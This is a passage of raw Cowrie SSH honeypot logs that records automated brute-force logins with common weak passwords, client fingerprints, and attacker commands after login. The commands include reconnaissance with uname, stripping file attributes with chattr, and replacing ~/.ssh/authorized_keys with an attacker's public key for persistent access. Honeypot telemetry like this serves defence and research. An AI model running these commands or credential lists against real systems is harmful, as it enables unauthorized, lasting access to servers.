0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:23.486865Z","src_ip":"212.227.125.160","session":"79e946ed6e1d"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:23.738741Z","src_ip":"212.227.125.160","session":"79e946ed6e1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54320,"dst_ip":"1.2.3.4","dst_port":22,"session":"99bcba7a4aaa","protocol":"ssh","message":"New connection: 212.227.235.229:54320 (1.2.3.4:22) [session: 99bcba7a4aaa]","sensor":"my-vps","timestamp":"2025-08-31T00:49:24.292089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:49:24.293092Z","src_ip":"212.227.235.229","session":"99bcba7a4aaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:49:24.535338Z","src_ip":"212.227.235.229","session":"99bcba7a4aaa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:24.931730Z","src_ip":"212.227.125.160","session":"79e946ed6e1d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"!QAZ@WSX","message":"login attempt [ftpuser/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:25.531203Z","src_ip":"212.227.235.229","session":"99bcba7a4aaa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:26.771691Z","src_ip":"212.227.235.229","session":"99bcba7a4aaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44382,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a76b719d903","protocol":"ssh","message":"New connection: 212.227.125.160:44382 (1.2.3.4:22) [session: 4a76b719d903]","sensor":"my-vps","timestamp":"2025-08-31T00:49:27.426014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:27.878333Z","src_ip":"212.227.125.160","session":"4a76b719d903"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:49:27.879057Z","src_ip":"212.227.125.160","session":"4a76b719d903"}
{"eventid":"cowrie.login.success","username":"root","password":"leomatos1992","message":"login attempt [root/leomatos1992] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:28.514088Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"admin123","message":"login attempt [daemon/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:30.869449Z","src_ip":"212.227.125.160","session":"4a76b719d903"}
{"eventid":"cowrie.session.closed","duration":"41.5","message":"Connection lost after 41.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:31.046221Z","src_ip":"212.227.125.160","session":"cef0d5437b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:31.875884Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T00:49:31.876565Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:32.551805Z","src_ip":"212.227.125.160","session":"4a76b719d903"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:33.305432Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:33.306544Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43956,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fdb2d784950","protocol":"ssh","message":"New connection: 212.227.125.160:43956 (1.2.3.4:22) [session: 0fdb2d784950]","sensor":"my-vps","timestamp":"2025-08-31T00:49:33.874639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:33.875514Z","src_ip":"212.227.125.160","session":"0fdb2d784950"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:33.949583Z","src_ip":"212.227.125.160","session":"0fdb2d784950"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:34.193338Z","src_ip":"212.227.125.160","session":"0fdb2d784950"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:35.355746Z","src_ip":"212.227.125.160","session":"0fdb2d784950"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51224,"dst_ip":"1.2.3.4","dst_port":22,"session":"269cd17cbbc2","protocol":"ssh","message":"New connection: 212.227.125.160:51224 (1.2.3.4:22) [session: 269cd17cbbc2]","sensor":"my-vps","timestamp":"2025-08-31T00:49:44.249342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:44.250574Z","src_ip":"212.227.125.160","session":"269cd17cbbc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:44.325665Z","src_ip":"212.227.125.160","session":"269cd17cbbc2"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:44.572500Z","src_ip":"212.227.125.160","session":"269cd17cbbc2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:45.700740Z","src_ip":"212.227.125.160","session":"269cd17cbbc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37804,"dst_ip":"1.2.3.4","dst_port":22,"session":"629e039352fa","protocol":"ssh","message":"New connection: 212.227.125.160:37804 (1.2.3.4:22) [session: 629e039352fa]","sensor":"my-vps","timestamp":"2025-08-31T00:49:54.640755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:54.642280Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:54.715989Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:54.938479Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:55.268615Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:49:55.269476Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:55.344916Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:55.346182Z","src_ip":"212.227.125.160","session":"629e039352fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50212,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ae65731d6be","protocol":"ssh","message":"New connection: 212.227.125.160:50212 (1.2.3.4:22) [session: 8ae65731d6be]","sensor":"my-vps","timestamp":"2025-08-31T00:50:05.200085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:05.200933Z","src_ip":"212.227.125.160","session":"8ae65731d6be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:50:05.274505Z","src_ip":"212.227.125.160","session":"8ae65731d6be"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:05.531362Z","src_ip":"212.227.125.160","session":"8ae65731d6be"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:06.668625Z","src_ip":"212.227.125.160","session":"8ae65731d6be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36604,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9986f72801f","protocol":"ssh","message":"New connection: 212.227.235.229:36604 (1.2.3.4:22) [session: d9986f72801f]","sensor":"my-vps","timestamp":"2025-08-31T00:50:07.122828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:50:08.070789Z","src_ip":"212.227.235.229","session":"d9986f72801f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:50:08.071715Z","src_ip":"212.227.235.229","session":"d9986f72801f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46350,"dst_ip":"1.2.3.4","dst_port":22,"session":"38d962ba7e16","protocol":"ssh","message":"New connection: 212.227.235.229:46350 (1.2.3.4:22) [session: 38d962ba7e16]","sensor":"my-vps","timestamp":"2025-08-31T00:50:13.870765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:50:13.871884Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:50:13.938888Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"root123","message":"login attempt [daemon/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.032862Z","src_ip":"212.227.235.229","session":"d9986f72801f"}
{"eventid":"cowrie.login.success","username":"root","password":"Slave@123","message":"login attempt [root/Slave@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.241734Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:50:14.388428Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.389146Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.390095Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.457916Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:50:14.647792Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:50:14.648517Z","src_ip":"212.227.235.229","session":"38d962ba7e16"}
